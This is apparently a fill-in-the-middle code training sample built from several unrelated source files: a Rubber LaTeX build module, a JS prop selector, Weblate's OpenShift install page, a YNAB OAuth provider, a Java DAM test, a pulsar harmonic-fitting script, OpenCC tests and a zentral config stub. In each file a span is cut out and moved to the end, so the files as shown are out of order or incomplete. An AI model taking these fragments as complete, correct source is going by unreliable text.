Called when \\end{document} is found. This stops the processing of any
input file, thus ignoring any code that appears afterwards.
"""
raise EndDocument
#-- Compilation steps {{{2
def compile (self):
"""
Run one LaTeX compilation on the source. Return true on success or
false if errors occurred.
"""
msg.progress(_("compiling %s") % msg.simplify(self.source()))
file = self.source()
prefix = os.path.join(self.vars["cwd"], "")
if file[:len(prefix)] == prefix:
file = file[len(prefix):]
if file.find(" ") >= 0:
file = '"%s"' % file
cmd = [self.vars["program"]]
if self.set_job:
if self.vars["engine"] == "VTeX":
msg.error(_("I don't know how set the job name with %s.")
% self.vars["engine"])
else:
cmd.append("-jobname=" + self.vars["job"])
specials = self.vars["src-specials"]
if specials != "":
if self.vars["engine"] == "VTeX":
msg.warn(_("I don't know how to make source specials with %s.")
% self.vars["engine"])
self.vars["src-specials"] = ""
elif specials == "yes":
cmd.append("-src-specials")
else:
cmd.append("-src-specials=" + specials)
cmd += self.vars["arguments"]
cmd += [x.replace("%s",file) for x in self.cmdline]
# Remove the CWD from elements in the path, to avoid potential problems
# with special characters if there are any (except that ':' in paths
# is not handled).
prefix = self.env.vars["cwd"]
prefix_ = os.path.join(prefix, "")
paths = []
for p in self.env.path:
if p == prefix:
paths.append(".")
elif p[:len(prefix_)] == prefix_:
paths.append("." + p[len(prefix):])
else:
paths.append(p)
inputs = string.join(paths, ":")
if inputs == "":
env = {}
else:
inputs = inputs + ":" + os.getenv("TEXINPUTS", "")
env = {"TEXINPUTS": inputs}
self.env.execute(cmd, env, kpse=1)
self.something_done = 1
if self.log.read(self.target + ".log"):
msg.error(_("Could not run %s.") % cmd[0])
return False
if self.log.errors():
return False
if not os.access(self.products[0], os.F_OK):
msg.error(_("Output file `%s' was not produced.") %
msg.simplify(self.products[0]))
return False
for aux, md5 in self.aux_md5.items():
self.aux_old[aux] = md5
self.aux_md5[aux] = md5_file(aux)
return True
def pre_compile (self, force):
"""
Prepare the source for compilation using package-specific functions.
This function must return False on failure. This function sets
`must_compile' to True if we already know that a compilation is
needed, because it may avoid some unnecessary preprocessing (e.g.
BibTeXing).
"""
aux = self.target + ".aux"
if os.path.exists(aux):
self.aux_md5[aux] = md5_file(aux)
else:
self.aux_md5[aux] = None
self.aux_old[aux] = None
self.log.read(self.target + ".log")
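# compile_needed() consults self.must_compile first, so assigning 'force' here folds a forced rebuild into the check on the next line.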
self.must_compile = force
self.must_compile = self.compile_needed()
msg.log(_("building additional files..."), pkg='latex')
for mod in self.modules.objects.values():
if not mod.pre_compile():
self.failed_module = mod
return False
return True
def post_compile (self):
"""
Run the package-specific operations that are to be performed after
each compilation of the main source. Returns true on success or false
on failure.
"""
msg.log(_("running post-compilation scripts..."), pkg='latex')
for file, md5 in self.onchange_md5.items():
if not os.path.exists(file):
continue
new = md5_file(file)
if md5 != new:
msg.progress(_("running %s") % self.onchange_cmd[file])
self.env.execute(["sh", "-c", self.onchange_cmd[file]])
self.onchange_md5[file] = new
for mod in self.modules.objects.values():
if not mod.post_compile():
self.failed_module = mod
return False
return True
def clean (self, all=0):
"""
Remove all files that are produced by compilation.
"""
self.remove_suffixes([".log", ".aux", ".toc", ".lof", ".lot"])
for file in self.products + self.removed_files:
if os.path.exists(file):
msg.log(_("removing %s") % file, pkg='latex')
os.unlink(file)
msg.log(_("cleaning additional files..."), pkg='latex')
for dep in self.source_nodes():
dep.clean()
for mod in self.modules.objects.values():
mod.clean()
#-- Building routine {{{2
def force_run (self):
return self.run(True)
def run (self, force=False):
"""
Run the building process until the last compilation, or stop on error.
This method supposes that the inputs were parsed to register packages
and that the LaTeX source is ready. If the second (optional) argument
is true, then at least one compilation is done. As specified by the
class depend.Node, the method returns True on success and False on
failure.
"""
if not self.pre_compile(force):
return False
# If an error occurs after this point, it will be while LaTeXing.
self.failed_dep = self
self.failed_module = None
if force or self.compile_needed():
self.must_compile = False
if not self.compile():
return False
if not self.post_compile():
return False
while self.recompile_needed():
self.must_compile = False
if not self.compile():
return False
if not self.post_compile():
return False
# Finally there was no error.
self.failed_dep = None
if self.something_done:
self.date = int(time.time())
return True
def compile_needed (self):
"""
Returns true if a first compilation is needed. This method supposes
that no compilation was done (by the script) yet.
"""
if self.must_compile:
return 1
msg.log(_("checking if compiling is necessary..."), pkg='latex')
if not os.path.exists(self.products[0]):
msg.debug(_("the output file doesn't exist"), pkg='latex')
return 1
if not os.path.exists(self.target + ".log"):
msg.debug(_("the log file does not exist"), pkg='latex')
return 1
if os.path.getmtime(self.products[0]) < os.path.getmtime(self.source()):
msg.debug(_("the source is younger than the output file"), pkg='latex')
return 1
if self.log.read(self.target + ".log"):
msg.debug(_("the log file is not produced by TeX"), pkg='latex')
return 1
return self.recompile_needed()
def recompile_needed (self):
"""
Returns true if another compilation is needed. This method is used
when a compilation has already been done.
"""
if self.must_compile:
self.update_watches()
return 1
if self.log.errors():
msg.debug(_("last compilation failed"), pkg='latex')
self.update_watches()
return 1
if self.deps_modified(os.path.getmtime(self.products[0])):
msg.debug(_("dependencies were modified"), pkg='latex')
self.update_watches()
return 1
suffix = self.update_watches()
if suffix:
msg.debug(_("the %s file has changed") % suffix, pkg='latex')
return 1
if self.log.run_needed():
msg.debug(_("LaTeX asks to run again"), pkg='latex')
aux_changed = 0
for aux, md5 in self.aux_md5.items():
if md5 is not None and md5 != self.aux_old[aux]:
aux_changed = 1
break
if not aux_changed:
msg.debug(_("but the aux files are unchanged"), pkg='latex')
return 0
return 1
msg.debug(_("no new compilation is needed"), pkg='latex')
return 0
def deps_modified (self, date):
"""
Returns true if any of the dependencies is younger than the specified
date.
"""
for name in self.sources:
if name in self.not_included:
continue
node = self.set[name]
if node.date > date:
return True
return False
#-- Utility methods {{{2
def get_errors (self):
if self.failed_module is None:
return self.log.get_errors()
else:
return self.failed_module.get_errors()
def watch_file (self, file):
"""
Register the given file (typically "jobname.toc" or such) to be
watched. When the file changes during a compilation, it means that
another compilation has to be done.
"""
if os.path.exists(file):
self.watched_files[file] = md5_file(file)
else:
self.watched_files[file] = None
def update_watches (self):
"""
Update the MD5 sums of all files watched, and return the name of one
of the files that changed, or None if they didn't change.
"""
changed = None
for file in self.watched_files.keys():
if os.path.exists(file):
new = md5_file(file)
if self.watched_files[file] != new:
changed = file
self.watched_files[file] = new
return changed
def remove_suffixes (self, list):
"""
Remove all files derived from the main source with one of the
specified suffixes.
"""
for suffix in list:
file = self.target + suffix
if os.path.exists(file):
msg.log(_("removing %s") % file, pkg='latex')
os.unlink(file)
#---- Base classes for modules ----{{{1
class Module (object):
"""
This is the base class for modules. Each module should define a class
named 'Module' that derives from this one. The default implementation
provides all required methods with no effects.
"""
def __init__ (self, env, dict):
"""
The constructor receives two arguments: 'env' is the compiling
environment, 'dict' is a dictionary that describes the command that
caused the module to load.
"""
def pre_compile (self):
"""
This method is called before the first LaTeX compilation. It is
supposed to build any file that LaTeX would require to compile the
document correctly. The method must return true on success.
"""
return True
def post_compile (self):
"""
This method is called after each LaTeX compilation. It is supposed to
process the compilation results and possibly request a new
compilation. The method must return true on success.
"""
return True
def clean (self):
"""
This method is called when cleaning the compiled files. It is supposed
to remove all the files that this module generates.
"""
def command (self, cmd, args):
"""
This is called when a directive for the module is found in the source.
The method can raise 'AttributeError' when the directive does not
exist and 'TypeError' if the syntax is wrong. By default, when called
with argument "foo" it calls the method "do_foo" if it exists, and
fails otherwise.
"""
getattr(self, "do_" + cmd)(*args)
def get_errors (self):
"""
This is called if something has failed during an operation performed
by this module. The method returns a generator with items of the same
form as in LaTeXDep.get_errors.
"""
if None:
yield None
class ScriptModule (Module):
"""
This class represents modules that are defined as Rubber scripts.
"""
def __init__ (self, env, filename):
vars = Variables(env.vars, {
'file': filename,
'line': None })
lineno = 0
file = open(filename)
for line in file.readlines():
line = line.strip()
lineno = lineno + 1
if line == "" or line[0] == "%":
continue
vars['line'] = lineno
lst = parse_line(line, vars)
env.command(lst[0], lst[1:], vars)
file.close()
class PyModule (Module):
def __init__ (self, document, pymodule, context):
self.pymodule = pymodule
if hasattr(pymodule, 'setup'):
pymodule.setup(document, context)
def pre_compile (self):
if hasattr(self.pymodule, 'pre_compile'):
return self.pymodule.pre_compile()
return True
def post_compile (self):
if hasattr(self.pymodule, 'post_compile'):
return self.pymodule.post_compile()
return True
def clean (self):
if hasattr(self.pymodule, 'clean'):
self.pymodule.clean()
def command (self, cmd, args):
if hasattr(self.pymodule, 'command'):
self.pymodule.command(cmd, args)
else:
getattr(self.pymodule, "do_" + cmd)(*args)
def get_errors (self):
if hasattr(self.pymodule, 'get_errors'):
return self.pymodule.get_errors()
return []<|fim▁end|>
|
"listoftables" : ("", self.h_listoftables),
"bibliography" : ("a", self.h_bibliography),
"bibliographystyle" : ("a", self.h_bibliographystyle),
|
<|file_name|>selectors.js<|end_file_name|><|fim▁begin|>import hasFeature from './has';
export function prop(path) {<|fim▁hole|> const names = path.split('.');
if (!(names[0] in props)) {
throw new Error(`Missing required prop ${names[0]}.`);
}
return names.reduce((p, name) => (p && p[name]), props);
};
}
export function has(featureName) {
return function(_props, _state, browser) {
return hasFeature(featureName, browser);
};
}<|fim▁end|>
|
return function(state, props) {
|
<|file_name|>wsgi_install.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright © 2014 Daniel Tschan <tschan@puzzle.ch>
#
# This file is part of Weblate <https://weblate.org/>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
import os
from string import Template
VIRTUALENV = os.path.join(
os.environ['OPENSHIFT_PYTHON_DIR'], 'virtenv', 'bin', 'activate_this.py'
)
with open(VIRTUALENV) as handle:
code = compile(handle.read(), 'activate_this.py', 'exec')
# pylint: disable=exec-used
exec(code, dict(__file__=VIRTUALENV)) # noqa
def application(environ, start_response):
ctype = 'text/html'
response_body = Template('''<!doctype html>
<html lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="utf-8">
<title>Installing Weblate</title>
<style>
html {
background: #f5f5f5;
height: 100%;
}
body {
color: #404040;
font-family: "Helvetica Neue",Helvetica,"Liberation Sans",Arial,sans-serif;
font-size: 14px;
line-height: 1.4;
}
h1 {
color: #000;
line-height: 1.38em;
margin: .4em 0 .5em;
font-size: 25px;
font-weight: 300;
border-bottom: 1px solid #fff;
}
h1:after {
content: "";
display: block;
height: 1px;
background-color: #ddd;
}<|fim▁hole|>pre {
padding: 13.333px 20px;
margin: 0 0 20px;
font-size: 13px;
line-height: 1.4;
background-color: #fff;
border-left: 2px solid rgba(120,120,120,0.35);
font-family: Menlo,Monaco,"Liberation Mono",Consolas,monospace !important;
}
.content {
display: table;
margin-left: -15px;
margin-right: -15px;
position: relative;
min-height: 1px;
padding-left: 30px;
padding-right: 30px;
}
</style>
</head>
<body>
<div class="content">
<h1>$action1 Weblate</h1>
<p>
Weblate is being $action2.
Please wait a few minutes and refresh this page.
</p>
$log
</div>
</body>
</html>''')
context = {}
if os.path.exists(os.environ['OPENSHIFT_DATA_DIR'] + '/.installed'):
context['action1'] = 'Updating'
context['action2'] = 'updated'
context['log'] = ''
else:
context['action1'] = 'Installing'
context['action2'] = 'installed'
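# Condense the install log: keep unindented lines and those mentioning "setup.py install", and replace the OpenShift gear home path with "~".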
log_msg = os.popen(
r"cat ${OPENSHIFT_PYTHON_LOG_DIR}/install.log |"
r" grep '^[^ ]\|setup.py install' |"
r" sed 's,/var/lib/openshift/[a-z0-9]\{24\},~,g'"
).read()
context['log'] = '<pre>' + log_msg + '</pre>'
response_body = response_body.substitute(context)
status = '200 OK'
response_headers = [
('Content-Type', ctype),
('Content-Length', str(len(response_body)))
]
start_response(status, response_headers)
return [response_body]<|fim▁end|>
|
p {
margin: 0 0 2em;
}
|
<|file_name|>provider.py<|end_file_name|><|fim▁begin|>from allauth.socialaccount.providers.base import AuthAction, ProviderAccount
from allauth.socialaccount.providers.oauth2.provider import OAuth2Provider
class Scope(object):
ACCESS = 'read-only'
class YNABAccount(ProviderAccount):
pass
<|fim▁hole|> name = 'YNAB'
account_class = YNABAccount
def get_default_scope(self):
scope = [Scope.ACCESS]
return scope
def get_auth_params(self, request, action):
ret = super(YNABProvider, self).get_auth_params(request,
action)
if action == AuthAction.REAUTHENTICATE:
ret['prompt'] = 'select_account consent'
return ret
def extract_uid(self, data):
return str(data['data']['user']['id'])
provider_classes = [YNABProvider]<|fim▁end|>
|
class YNABProvider(OAuth2Provider):
id = 'ynab'
|
<|file_name|>DamAutoCroppingTest.java<|end_file_name|><|fim▁begin|>/*
* #%L
* wcm.io
* %%
* Copyright (C) 2019 wcm.io
* %%
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* #L%
*/
package io.wcm.handler.mediasource.dam.impl;
import static com.day.cq.dam.api.DamConstants.PREFIX_ASSET_WEB;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertNull;
import org.junit.jupiter.api.Test;
import org.junit.jupiter.api.extension.ExtendWith;
import com.day.cq.dam.api.Asset;
import com.day.cq.dam.api.Rendition;
<|fim▁hole|>import io.wcm.testing.mock.aem.junit5.AemContext;
import io.wcm.testing.mock.aem.junit5.AemContextExtension;
@ExtendWith(AemContextExtension.class)
class DamAutoCroppingTest {
private final AemContext context = AppAemContext.newAemContext();
@Test
@SuppressWarnings("null")
void testGetWebRenditionForCropping() {
Asset asset = context.create().asset("/content/dam/asset1.jpg", 160, 90, "image/jpeg");
Rendition webRendition = context.create().assetRendition(asset, PREFIX_ASSET_WEB + ".80.45.jpg", 80, 45, "image/jpeg");
RenditionMetadata result = DamAutoCropping.getWebRenditionForCropping(asset);
assertEquals(webRendition.getPath(), result.getRendition().getPath());
}
@Test
void testGetWebRenditionNotExisting() {
Asset assetWithoutRenditions = context.create().asset("/content/dam/asset2.jpg", 160, 90, "image/jpeg");
assertNull(DamAutoCropping.getWebRenditionForCropping(assetWithoutRenditions));
}
}<|fim▁end|>
|
import io.wcm.handler.media.testcontext.AppAemContext;
|
<|file_name|>fitharms.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
from __future__ import print_function,division
from astropy.io import fits
import matplotlib.pyplot as plt
import numpy as np
import matplotlib
from pint.templates import lctemplate,lcprimitives,lcfitters
from pint.eventstats import z2m,sf_z2m, hm, sf_hm, sig2sigma
import sys
from astropy import log
import scipy.stats
def compute_fourier(phases,nh=10,pow_phase=False):
'''Compute Fourier amplitudes from an array of pulse phases
phases should be [0,1.0)
nh is the number of harmonics (1 = fundamental only)
Returns: n plus the cos and sin component arrays, unless pow_phase is True,
in which case it returns n, Leahy-normalized Fourier power and phase arrays
DC bin is not computed or returned
'''
phis = 2.0*np.pi*phases # Convert phases to radians
n = len(phis)
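# Empirical Fourier coefficients: c_k = (2/n) * sum(cos(k*phi)), s_k = (2/n) * sum(sin(k*phi))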
c = np.asarray([(np.cos(k*phis)).sum() for k in range(1,nh+1)])/n
s = np.asarray([(np.sin(k*phis)).sum() for k in range(1,nh+1)])/n
c *= 2.0
s *= 2.0
if pow_phase:
# CHECK! There could be errors here!
# These should be Leahy normalized powers
fourier_pow = (n/2)*(c**2+s**2)
fourier_phases = np.arctan2(s,c)
return n,fourier_pow,fourier_phases
else:
return n,c,s
def evaluate_fourier(n,c,s,nbins,k=None):
# This should be updated to do a little integral over each bin.
# Currently evaluates the model at the center of each bin
model = np.zeros(nbins)+n/nbins
theta = 2.0*np.pi*np.arange(nbins,dtype=np.float)/nbins
theta += theta[1]/2.0
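# theta now holds the bin-center phases in radians.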
if k is not None:
model += (n/nbins)*(c[k]*np.cos((k+1)*theta) + s[k]*np.sin((k+1)*theta))
else:
for k in range(len(c)):
model += (n/nbins)*(c[k]*np.cos((k+1)*theta) + s[k]*np.sin((k+1)*theta))
return model
def evaluate_chi2(hist,model):
# Question here is whether error should be sqrt(data) or sqrt(model)
return ((hist-model)**2/model).sum()
def compute_phist(phases,nbins=200):
h, edges = np.histogram(phases,bins=np.linspace(0.0,1.0,nbins+1,endpoint=True))
return edges[:-1], h
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(description = "Fit a set of pulse phases to harmonics")
parser.add_argument("evname", help="Input event file (must have PULSE_PHASE column)")
parser.add_argument("--white",help = "Replace phases with white random numbers, for testing", action="store_true")
parser.add_argument("--txt",help = "Assume input file is .txt instead of FITS", action="store_true")
parser.add_argument("--showcomps",help = "Show individual components of harmonic fit on plot", action="store_true")
parser.add_argument("--noplot",help = "Don't show any plots", action="store_true")
parser.add_argument("--output",help = "Save figures with basename", default=None)
parser.add_argument("--numharm",help="Max harmonic to use in analysis (1=Fundamental only)",default=4,type=int)
parser.add_argument("--numbins",help="Number of bins for histograms",default=200,type=int)
parser.add_argument("--emin",help="Minimum energy to include (keV)",default=0.25,type=float)
parser.add_argument("--emax",help="Maximum energy to include (keV)",default=12.0,type=float)
args = parser.parse_args()
if args.txt:
exposure = None
ph,en = np.loadtxt(args.evname,unpack=True,usecols=(1,2),skiprows=3)
log.info("Read {0} phases from .txt file".format(len(ph)))
tstart = 0.0
else:
f = fits.open(args.evname)
en = f['events'].data.field('pi')
ph = f['events'].data.field('pulse_phase')
log.info("Read {0} phases from FITS file".format(len(ph)))
exposure = float(f['events'].header['EXPOSURE'])
tstart = float(f['events'].header['TSTART'])
log.info("Exposure = {0} s".format(exposure))
if args.white:
# Random phases uniform over [0,1)
ph = np.random.random_sample(len(en))
log.info("Replaced with {0} random phases".format(len(en)))
matplotlib.rcParams['font.family'] = "serif"
matplotlib.rcParams.update({'font.size': 13})
matplotlib.rc('axes', linewidth=1.5)
if args.output:
resultsfile = open("{0}_results.txt".format(args.output),"w")
print("{0:.6f}".format(tstart),file=resultsfile)
# Filter on energy
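# PI channel values are assumed to follow the NICER convention of 10 eV per channel, hence keV * 100.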
idx = np.where(np.logical_and(en > int(args.emin*100), en < int(args.emax*100) ))[0]
ph = ph[idx]
en = en[idx]
# Hack to manually split out a segment
#q = 3 # Use 0, 1, 2, 3
#qn = len(ph)//4
#ph = ph[q*qn:(q+1)*qn]
#en = en[q*qn:(q+1)*qn]
nbins = args.numbins
bins,phist = compute_phist(ph,nbins=nbins)
fig,axs = plt.subplots(nrows=2,ncols=1)
plt.subplots_adjust(left=0.15, bottom=0.1, right=0.97, top=0.94,hspace=0.001)
ax=axs[0]
ax.tick_params(direction='in', length=6, width=2, colors='k',top=True, right=True, labelbottom=False)
# ax.text(.5,.8,'PSR J0030+0451', horizontalalignment='center', transform=ax.transAxes)
# ax.text(.5,.8,'PSR J0437-4715', horizontalalignment='center', transform=ax.transAxes)
# ax.text(.2,.8,'PSR J1231-1411', horizontalalignment='center', transform=ax.transAxes)
# ax.text(.8,.8,'PSR J2124-3358', horizontalalignment='center', transform=ax.transAxes)
ax.step(np.concatenate((bins,np.ones(1))),np.concatenate((phist,phist[-1:])),color='k',where='post')
ax.set_xlim(0.0,1.0)
ax.set_ylabel('Counts per bin')
n,c,s = compute_fourier(ph,nh=args.numharm)
model = evaluate_fourier(n,c,s,nbins)
ax.plot(bins+bins[1]/2.0,model,color='r',lw=2)
if args.showcomps:
for k in range(len(c)):
ax.plot(np.linspace(0.0,1.0,nbins),evaluate_fourier(n,c,s,nbins,k=k),ls='--')
fn,fpow,fphase = compute_fourier(ph,nh=args.numharm,pow_phase=True)
i=1
log.info("Harm LeahyPower Phase(deg)")
for fp, fph in zip(fpow,fphase):
log.info("{0:2d} {1:12.3f} {2:9.3f} deg".format(i,fp,np.rad2deg(fph)))
if args.output:
print("{0:2d} {1:12.3f} {2:9.3f}".format(i,fp,np.rad2deg(fph)),file=resultsfile)
i+=1
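# Pulsed counts: the area of the harmonic model above its minimum, i.e. above the unpulsed floor.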
pcounts = (model-model.min()).sum()
pcounts_err = np.sqrt(model.sum() + model.min()*len(model))
if exposure:
log.info("Pulsed counts = {0:.3f}, count rate = {1:.3f}+/-{2:.4f} c/s".format(pcounts, pcounts/exposure, pcounts_err/exposure))
log.info("Total rate = {0:.3f} c/s, Unpulsed rate = {1:.3f} c/s".format(n/exposure, n/exposure-pcounts/exposure))
ax = axs[1]
ax.tick_params(direction='in', length=6, width=2, colors='k',top=True, right=True)
ax.errorbar(np.linspace(0.0,1.0,nbins),phist-model,yerr=np.sqrt(phist),fmt='.',ecolor='k')
chisq = evaluate_chi2(phist,model)
nparams = 1 + 2*args.numharm # 1 for DC + 2 for each sinusoidal component
ax.set_xlim(0.0,1.0)
ax.set_xlabel('Pulse Phase')
ax.set_ylabel('Residuals (counts)')
ax.tick_params(direction='in', length=6, width=2, colors='k',top=True)
ndof = len(phist)-nparams
axs[0].set_title("NumHarm = {0}, Chisq = {1:.2f}, DOF = {2}".format(args.numharm,chisq,ndof))
ax.grid(1)
# ax.set_label("{0} Harmonic Fit to Profile".format(args.numharm))
plt.tight_layout()
if args.output:
fig.savefig("{0}_harmfit.pdf".format(args.output))
# Plot distribution of residuals to compare to a gaussian
fig,ax = plt.subplots()
ax.tick_params(direction='in', length=6, width=2, colors='k',top=True, right=True)
chi = (phist-model)/np.sqrt(model)
#x, y = np.histogram(chi,bins=np.linspace(-2.0,2.0,0.1))
x = np.linspace(-3.0,3.0,32,endpoint=True)
ax.hist(chi,bins=x,density=True)
ax.set_title('Histogram of residuals')
ax.plot(x,scipy.stats.norm.pdf(x))
plt.tight_layout()
# Plot histogram of phase differences to see if they are Poisson
fig,ax = plt.subplots()
ax.tick_params(direction='in', length=6, width=2, colors='k',top=True, right=True)
ph.sort()
pdiffs = (ph[1:]-ph[:-1])*1.0
x = np.linspace(0.0,50.0e-6,200,endpoint=True)
histn, histbins, histpatches = ax.hist(pdiffs,bins=x,density=True,log=True)
ax.set_title('Histogram of phase differences')
ax.set_xlabel('Phase diff')
ax.plot(x,np.exp(-len(pdiffs)*(x*1.0))*n)
plt.tight_layout()
# Compute number of significant harmonics
# First by plotting Leahy powers
fig,axs = plt.subplots(nrows=2,ncols=1)
ax = axs[0]
ax.tick_params(direction='in', length=6, width=2, colors='k',top=True, right=True)
n,pow,phases = compute_fourier(ph,nh=nbins//2,pow_phase=True)
ax.semilogy(np.arange(len(pow))+1,pow,marker='o')
# Leahy power of 5.99 corresponds to 2 sigma, I think<|fim▁hole|> ax.axhline(2.0,color='b',ls='--')
#ax.xaxis.set_ticks(np.arange(1,len(pow)+1))
#ax.set_xlabel('Harmonic Number')
ax.set_ylabel('Leahy Power')
ax.set_title("Power Spectrum")
plt.tight_layout()
ax = axs[1]
ax.tick_params(direction='in', length=6, width=2, colors='k',top=True, right=True)
ax.plot(np.arange(len(pow))+1,pow,marker='o')
ax.axhline(5.99,color='r')
ax.axhline(2.0,color='b',ls='--')
#ax.xaxis.set_ticks(np.arange(1,len(pow)+1))
ax.set_ylim(0.0,10.0)
ax.text(1.0,7.0,'Mean power {0:.3f}'.format(pow.mean()))
ax.set_xlabel('Harmonic Number')
ax.set_ylabel('Leahy Power')
if args.output:
fig.savefig("{0}_leahy.pdf".format(args.output))
plt.tight_layout()
# Then by computing chisq as a function of number of harmonics in model
chisq = []
ndof = []
maxharms = np.arange(1,min(33,nbins//4+1))
n,c,s = compute_fourier(ph,nh=maxharms[-1])
for maxharm in maxharms:
model = evaluate_fourier(n,c[:maxharm],s[:maxharm],nbins)
chisq.append(evaluate_chi2(phist,model))
nparams = 1 + 2*maxharm # 1 for DC + 2 for each sinusoidal component
ndof.append(len(phist)-nparams)
chisq = np.asarray(chisq)
ndof = np.asarray(ndof)
fig,ax = plt.subplots()
ax.tick_params(direction='in', length=6, width=2, colors='k',top=True, right=True)
ax.plot(maxharms,chisq/ndof,'o',ls='-')
ax.set_ylim(0.5,3.0)
ax.axhline(1.0,color='r',ls='--')
ax.set_xlabel('Number of Harmonics')
ax.set_ylabel('Chisq')
ax.set_title("Chisq/DOF vs. Number of Harmonics")
#ax.xaxis.set_ticks(maxharms)
#ax.semilogy(maxharms,ndof)
plt.tight_layout()
if args.output:
fig.savefig("{0}_chisq.pdf".format(args.output))
# Then look at amplitudes and phases as a function of energy cuts
# Look at color oscillations
# Select photons above and below some energy cut and look at the ratio
ensplit = 55
softidx = np.where(en<ensplit)[0]
hardidx = np.where(en>=ensplit)[0]
colorbins = 32
softbins, softn = compute_phist(ph[softidx],nbins=colorbins)
hardbins, hardn = compute_phist(ph[hardidx],nbins=colorbins)
softn = np.asarray(softn,dtype=np.float)
hardn = np.asarray(hardn,dtype=np.float)
fig,ax = plt.subplots()
color = hardn/softn
# Propagate Poisson errors to get error in ratio
cerr = color*np.sqrt(1.0/softn + 1.0/hardn)
#ax.step(np.concatenate((softbins,np.ones(1))),np.concatenate((color,color[-1:])),color='C0',where='post')
ax.errorbar(softbins+0.5*softbins[1],color,yerr=cerr,color='k',fmt='.')
ax.set_xlim(0.0,1.0)
ax.set_xlabel('Pulse Phase')
ax.set_ylabel('Spectral Color')
if not args.noplot:
plt.show()<|fim▁end|>
|
ax.axhline(5.99,color='r')
|
<|file_name|>conversion_test.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import sys
import os
import unittest
class OpenCCTest(unittest.TestCase):
def setUp(self):
self.openCC = OpenCC()
def test_hk2s(self):
self.openCC.set_conversion('hk2s')
words = '香煙(英語:Cigarette),為煙草製品的一種。滑鼠是一種很常見及常用的電腦輸入設備。'
self.assertEqual(self.openCC.convert(words), '香烟(英语:Cigarette),为烟草制品的一种。滑鼠是一种很常见及常用的电脑输入设备。')
<|fim▁hole|> self.assertEqual(self.openCC.convert(words), '香煙(英語:Cigarette),為煙草製品的一種。鼠標是一種很常見及常用的電腦輸入設備。')
def test_s2t(self):
self.openCC.set_conversion('s2t')
words = '香烟(英语:Cigarette),为烟草制品的一种。鼠标是一种很常见及常用的电脑输入设备。'
self.assertEqual(self.openCC.convert(words), '香菸(英語:Cigarette),爲菸草製品的一種。鼠標是一種很常見及常用的電腦輸入設備。')
def test_s2tw(self):
self.openCC.set_conversion('s2tw')
words = '香烟(英语:Cigarette),为烟草制品的一种。鼠标是一种很常见及常用的电脑输入设备。'
self.assertEqual(self.openCC.convert(words), '香菸(英語:Cigarette),為菸草製品的一種。鼠標是一種很常見及常用的電腦輸入設備。')
def test_s2twp(self):
self.openCC.set_conversion('s2twp')
words = '香烟(英语:Cigarette),为烟草制品的一种。內存是一种很常见及常用的电脑输入设备。'
self.assertEqual(self.openCC.convert(words), '香菸(英語:Cigarette),為菸草製品的一種。記憶體是一種很常見及常用的電腦輸入裝置。')
def test_t2hk(self):
self.openCC.set_conversion('t2hk')
words = '香菸(英語:Cigarette),爲菸草製品的一種。滑鼠是一種很常見及常用的電腦輸入裝置。'
self.assertEqual(self.openCC.convert(words), '香煙(英語:Cigarette),為煙草製品的一種。滑鼠是一種很常見及常用的電腦輸入裝置。')
def test_t2s(self):
self.openCC.set_conversion('t2s')
words = '香菸(英語:Cigarette),爲菸草製品的一種。滑鼠是一種很常見及常用的電腦輸入裝置。'
self.assertEqual(self.openCC.convert(words), '香烟(英语:Cigarette),为烟草制品的一种。滑鼠是一种很常见及常用的电脑输入装置。')
def test_t2tw(self):
self.openCC.set_conversion('t2tw')
words = '香菸(英語:Cigarette),爲菸草製品的一種。鼠標是一種很常見及常用的電腦輸入設備。'
self.assertEqual(self.openCC.convert(words), '香菸(英語:Cigarette),為菸草製品的一種。鼠標是一種很常見及常用的電腦輸入設備。')
def test_tw2s(self):
self.openCC.set_conversion('tw2s')
words = '香菸(英語:Cigarette),為菸草製品的一種。滑鼠是一種很常見及常用的電腦輸入裝置。'
self.assertEqual(self.openCC.convert(words), '香烟(英语:Cigarette),为烟草制品的一种。滑鼠是一种很常见及常用的电脑输入装置。')
def test_tw2sp(self):
self.openCC.set_conversion('tw2sp')
words = '香菸(英語:Cigarette),為菸草製品的一種。記憶體是一種很常見及常用的電腦輸入裝置。'
self.assertEqual(self.openCC.convert(words), '香烟(英语:Cigarette),为烟草制品的一种。内存是一种很常见及常用的电脑输入设备。')
if __name__ == '__main__':
sys.path.append(os.pardir)
from opencc import OpenCC
unittest.main()<|fim▁end|>
|
def test_s2hk(self):
self.openCC.set_conversion('s2hk')
words = '香烟(英语:Cigarette),为烟草制品的一种。鼠标是一种很常见及常用的电脑输入设备。'
|
<|file_name|>config.py<|end_file_name|><|fim▁begin|>import base64
import itertools
import json
import logging
import os
import re
import time
from .buckets import get_bucket_client
from .params import get_param_client
from .secrets import get_secret_client
logger = logging.getLogger("zentral.conf.config")
class Proxy:
pass
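# A Proxy defers resolution of an external value (env var, file, parameter, secret...) until get() is called.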
class EnvProxy(Proxy):
def __init__(self, name):
self._name = name
def get(self):
return os.environ[self._name]
class ResolverMethodProxy(Proxy):
def __init__(self, resolver, proxy_type, key):
if proxy_type == "file":
self._method = resolver.get_file_content
elif proxy_type == "param":
self._method = resolver.get_parameter_value
elif proxy_type == "secret":
self._method = resolver.get_secret_value
elif proxy_type == "bucket_file":
self._method = resolver.get_bucket_file
else:
raise ValueError("Unknown proxy type %s", proxy_type)
self._key = key
def get(self):
return self._method(self._key)
class JSONDecodeFilter(Proxy):
def __init__(self, child_proxy):
